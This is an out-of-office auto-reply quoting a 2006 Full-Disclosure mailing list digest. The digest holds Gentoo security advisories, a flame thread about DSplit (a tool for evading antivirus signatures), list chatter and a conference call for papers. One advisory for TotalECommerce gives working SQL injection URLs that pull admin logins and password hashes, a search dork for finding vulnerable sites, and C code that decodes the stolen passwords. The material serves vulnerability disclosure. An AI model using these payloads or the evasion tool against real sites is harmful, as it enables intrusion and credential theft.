[<prev] [next>] [day] [month] [year] [list]
Message-ID: <s40a8cc3.052@mail.bbl-inc.com>
Date: Sun Mar 5 12:01:37 2006
From: DMCCOY at bbl-inc.com (DONNY MCCOY)
Subject: Re: Full-Disclosure Digest, Vol 13, Issue 8
I will be in Denver through Thursday and will return to Syracuse on
Friday. I will check voicemail and e-mail periodically as time allows.
If your e-mail is urgent please contact the help desk in Syracuse at
x19511.
Thanks.
Donny
>>> full-disclosure 03/05/06 07:00 >>>
Send Full-Disclosure mailing list submissions to
full-disclosure@...ts.grok.org.uk
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@...ts.grok.org.uk
You can reach the person managing the list at
full-disclosure-owner@...ts.grok.org.uk
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please trim
your post appropriately. Thank you.
Today's Topics:
1. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com)
2. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com)
3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability
(Thierry Carrez)
5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability. (nukedx@...edx.com)
6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in
included XPdf code (Thierry Carrez)
7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows
(Thierry Carrez)
8. Please remove me from the list (W1nd man)
9. Re: Please remove me from the list (Alexander Hristov)
10. (no subject) (Steven Rakick)
11. Re: (no subject) (Steven Rakick)
12. Re: (no subject) (PERFECT.MATERIAL)
13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)
----------------------------------------------------------------------
Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad@...poverflow.com" <ad@...poverflow.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Message-ID: <44098395.6010604@...poverflow.com>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
yeah already knowing they are most fucking bastards
Alexander Hristov wrote:
> Clamav detects it and can unrar it with the unrar module
>
> On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit
> is the small brother of an old tool known as UKsplitter wich is now
> abandonned, does not work in vmware, fails to run under windows
> 2003.
>
> DSplit has been coded for persons like me, targeted by AV firms and
> I'm not responsible of the bad uses of it, I recall this method is
> known since a long time and it's up to the AV firms to review their
> detections software.
>
>
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> http://getdsplit.class101.org
>
> usual critics , flames, can be directly sent to the Recycle Bin :>
>>>
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>>>
>
>> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
>> http://securitydot.net >
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBRAmDlK+LRXunxpxfAQLmag/8D32IgYedMC/LKtfLKeNv/Dafq9i2NTKu
Hsns+6DpLvC5QlOUWUixfok2Nici4lp5dy/xF8D01tqgh3gKFnmv2u0dqjxj6w4K
VeZC2teXcYndCWrMDCX+3HFcT4+ZUjkMjGixAwnQhAuIsstQ5pP9pfOT+3PrZFeE
Li8IUqFzUL+sUkMhNeZm51mPF69nHeGTRYY9mKKploXeczCpH33EGjeMoDynwKwp
VPESww9avNd9AiCQ+bvE9Eeh1+kihcJwwyFfWqd64E4C3L85Cr+GqQ+EzQMp/ZmW
Bq4ETGD5En02DnHo8+S152VisipIKgWZpzlzgTlFTkyuDnh+aS5VH1ZJGoiMhONo
mNrDe45a3G2r6t3NA/PRJLocKrnrsXeGw7EqQ52GJ9sWrBXT+yJ/CbAZ6yg0ToVU
7zB8ggAsuedNKPCG3LZH/w5eDErFlG+c9pDzrvUv4NxR1BDRfPMlsSYcAR7zq9tf
q/I1fZO43hT3nSyukT8NNB1vN7S7J6Zw2Djh6jEjyPwefEnbFmd3Au1zF+tR6qX1
mkScSpoMgbJKcFkk8U2ZAskx18qHvkalKjnjbqxctigQ2sTf4FLtJlCwF5ux6Rld
Ko5Bs/yIdHr8b0l7r+v1Ek53P/BqtU+3QUC5y3maDSpK81VRlx3mI1Z3IWrrsUuA
KMruj3WAFys=
=+V3s
-----END PGP SIGNATURE-----
------------------------------
Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad@...poverflow.com" <ad@...poverflow.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Message-ID: <44098521.6010509@...poverflow.com>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect virus.
Alexander Hristov wrote:
> Clamav detects it and can unrar it with the unrar module
>
> On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit
> is the small brother of an old tool known as UKsplitter wich is now
> abandonned, does not work in vmware, fails to run under windows
> 2003.
>
> DSplit has been coded for persons like me, targeted by AV firms and
> I'm not responsible of the bad uses of it, I recall this method is
> known since a long time and it's up to the AV firms to review their
> detections software.
>
>
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> http://getdsplit.class101.org
>
> usual critics , flames, can be directly sent to the Recycle Bin :>
>>>
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>>>
>
>> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
>> http://securitydot.net >
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
RDdNjcudUuw=
=iAHW
-----END PGP SIGNATURE-----
------------------------------
Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer@...il.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad@...poverflow.com" <ad@...poverflow.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Message-ID:
<734063a30603040441v3beb90d5n7faab639859c8dd7@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Well clamav is the best AV for no money and its very good developed
again for no money :)
On 3/4/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> and it clearly shows clamav is a crap antivirus where the tools like
> DSplit are a problem for them,
> and they will detect DSplit when they can't find a better way to
> detect virus.
>
>
>
> Alexander Hristov wrote:
> > Clamav detects it and can unrar it with the unrar module
> >
> > On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit
> > is the small brother of an old tool known as UKsplitter wich is now
> > abandonned, does not work in vmware, fails to run under windows
> > 2003.
> >
> > DSplit has been coded for persons like me, targeted by AV firms and
> > I'm not responsible of the bad uses of it, I recall this method is
> > known since a long time and it's up to the AV firms to review their
> > detections software.
> >
> >
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> > http://getdsplit.class101.org
> >
> > usual critics , flames, can be directly sent to the Recycle Bin :>
> >>>
> > _______________________________________________ Full-Disclosure -
> > We believe in it. Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> > sponsored by Secunia - http://secunia.com/
> >>>
> >
> >> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
> >> http://securitydot.net >
> >
> >
> >
> >
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
> OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
> gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
> GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
> DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
> uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
> 59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
> 2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
> 9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
> TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
> rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
> RDdNjcudUuw=
> =iAHW
> -----END PGP SIGNATURE-----
>
>
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net
>
------------------------------
Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection
vulnerability
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
security-alerts@...uxsecurity.com
Message-ID: <4409B61B.5060903@...too.org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WordPress: SQL injection vulnerability
Date: March 04, 2006
Bugs: #121661
ID: 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
WordPress is vulnerable to an SQL injection vulnerability.
Background
==========
WordPress is a PHP and MySQL based content management and publishing
system.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress <= 1.5.2 >= 2.0.1
Description
===========
Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comments posting. This vulnerability was already fixed in the
2.0-series of WordPress.
Impact
======
An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.
Workaround
==========
Disable or moderate comments on your WordPress blogs.
Resolution
==========
All WordPress users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/89aced5d/signature-0001.bin
------------------------------
Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx@...edx.com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id)
Remote SQL Injection Vulnerability.
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com
Message-ID: <20060304162607.2lyie75fm1m4gwow@...mail.nukedx.com>
Content-Type: text/plain; charset=ISO-8859-9
--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries
to id
parameter
in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and
with
example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact with vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
---End of code---
Greets to: |SaMaN|
------------------------------
Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX:
Multiple overflows in included XPdf code
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
security-alerts@...uxsecurity.com
Message-ID: <4409C122.4090103@...too.org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf
code
Date: March 04, 2006
Bugs: #115775
ID: 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.
Background
==========
teTex is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is and ASCII publishing TeX distribution.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/tetex < 2.0.2-r8 >= 2.0.2-r8
2 app-text/cstetex < 2.0.2-r2 >= 2.0.2-r2
3 app-text/ptex < 3.1.5-r1 >= 3.1.5-r1
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
CSTeX, teTex, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).
Impact
======
An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All teTex users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"
All CSTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"
All pTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"
References
==========
[ 1 ] CVE-2005-3193
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
[ 2 ] GLSA 200512-08
http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
[ 3 ] CESA-2005-003
http://scary.beasts.org/security/CESA-2005-003.txt
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/5e29724b/signature-0001.bin
------------------------------
Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple
integer overflows
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
security-alerts@...uxsecurity.com
Message-ID: <4409CDBA.8060405@...too.org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: MPlayer: Multiple integer overflows
Date: March 04, 2006
Bugs: #115760, #122029
ID: 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.
Background
==========
MPlayer is a media player capable of handling multiple multimedia file
formats.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-video/mplayer < 1.0.20060217 >= 1.0.20060217
Description
===========
MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.
Impact
======
An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All MPlayer users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
">=media-video/mplayer-1.0.20060217"
References
==========
[ 1 ] CVE-2005-4048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
[ 2 ] CVE-2006-0579
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
[ 3 ] GLSA 200601-06
http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/568fbea3/signature-0001.bin
------------------------------
Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n@...la.com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure@...ts.grok.org.uk>
Message-ID: <1141503369.961000-13997465-23441@...la.com>
Content-Type: text/plain; charset="us-ascii"
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html
------------------------------
Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer@...il.com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n@...la.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<734063a30603041752v7a8cc6efnd28861cae0f8be32@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
On 3/4/06, W1nd man <w1ndm4n@...la.com> wrote:
>
>
>
> Please remove me from the list
>
>
> ________________________________
>
> Walla! Mail - get your free 3G mail today
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net
>
------------------------------
Message: 10
Date: Sat, 4 Mar 2006 18:01:51 -0800
From: Steven Rakick <stevenrakick@...oo.com>
Subject: [Full-disclosure] (no subject)
To: full-disclosure@...ts.grok.org.uk
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
Content-Type: text/plain; charset="iso-8859-1"
Hello HACKERZ!,
Your personal DONGEZ to this message.
Sincerely,
BanHaus manager
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f1416faf/attachment-0001.html
------------------------------
Message: 11
Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST)
From: Steven Rakick <stevenrakick@...oo.com>
Subject: Re: [Full-disclosure] (no subject)
To: full-disclosure@...ts.grok.org.uk
Message-ID: <20060305042832.34191.qmail@...53201.mail.yahoo.com>
Content-Type: text/plain; charset=iso-8859-1
Not that it matters but...
Received: from www.c0replay.net (unknown
[206.251.72.74])
by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
for <full-disclosure@...ts.grok.org.uk>;
Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure@...ts.grok.org.uk
From: Steven Rakick <stevenrakick@...oo.com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
------------------------------
Message: 12
Date: Sun, 5 Mar 2006 00:34:03 -0500
From: PERFECT.MATERIAL <perfect.material@...il.com>
Subject: Re: [Full-disclosure] (no subject)
To: "Steven Rakick" <stevenrakick@...oo.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<631ac1d90603042134n7a22e7aale14d2aa7914dda58@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Dick Breath,
You should sign your electronic mail with some unhackable crypto
technology. That way you will never need to show off your cut and paste
technology to the others. You are irresponsible. Not that it matters
but...
PERFECT.MATERIAL
On 3/4/06, Steven Rakick <stevenrakick@...oo.com> wrote:
>
> Not that it matters but...
>
> Received: from www.c0replay.net (unknown
> [206.251.72.74])
> by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
> for <full-disclosure@...ts.grok.org.uk>;
> Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
> Date: Sat, 4 Mar 2006 18:01:51 -0800
> To: full-disclosure@...ts.grok.org.uk
> From: Steven Rakick <stevenrakick@...oo.com>
> Message-ID:
> <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
> X-Priority: 3
> X-Mailer: PHPMailer [version 1.73]
>
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060305/d547fd1e/attachment-0001.html
------------------------------
Message: 13
Date: Sun, 05 Mar 2006 13:34:43 +0800
From: Praburaajan <prabu@...kinthebox.org>
Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers
To: full-disclosure@...ts.grok.org.uk,
dailydave@...ts.immunitysec.com,
pen-test@...urityfocus.com,
bugtraq@...urityfocus.com, Voipsec@...psa.org,
submit@...w0rm.com,
webappsec@...urityfocus.com, ipv6@...f.org,
security-basics@...urityfocus.com
Message-ID: <440A7873.4000202@...kinthebox.org>
Content-Type: text/plain; charset=windows-1252; format=flowed
Greetings from Hack in The Box -- We are pleased to announce that the
Call for Paper (CfP) for HITBSecConf2006 - Malaysia is now open! Set to
take place from September 18th - 21st 2006 at The Westin Kuala Lumpur,
this years conference promises to once again deliver an International
deep-knowledge security conference. HITBSecConf has been described as
"the most intimate of hacker gatherings" and is the largest network
security conference in Asia!
SUBMISSION
HITBSecConf is a deep-knowledge technical conference. Talks that are
more technical or that discuss new and never before seen attack methods
are of more interest than a subject that has been covered several times
before. Summaries not exceeding 250 words should be submitted (in plain
text format) to cfp -at- hackinthebox.org for review and possible
inclusion in the programme.
Submissions are due no later than 1st of May 2006
TOPICS
Topics of interest include, but are not limited to the following:
* Analysis of network and security vulnerabilities
* Firewall technologies
* Intrusion detection
* Data Recovery and Incident Response
* GPRS, 3G and CDMA Security
* Identification and Entity Authentication
* Network Protocol and Analysis
* Smart Card Security
* Virus and Worms
* WLAN and Bluetooth Security.
* Analysis of malicious code
* Applications of cryptographic techniques,
* Analysis of attacks against networks and machines
* Denial-of-service attacks and countermeasures
* File system security
* Security in heterogeneous and large-scale environments
* Techniques for developing secure systems
PLEASE NOTE: We do not accept product or vendor related pitches. If your
talk involves an advertisement for a new product or service your company
is offering, please do not submit.
Your submission should include:
* Name, title, address, email and phone/contact number
* Draft of the proposed presentation (in PDF or PowerPoint format),
proof of concept for tools and exploits, etc.
* Short biography, qualification, occupation, achievement and
affiliations (limit 150 words).
* Summary or abstract for your presentation (limit 250 words)
* Time (45-60 minutes including time for discussion and questions)
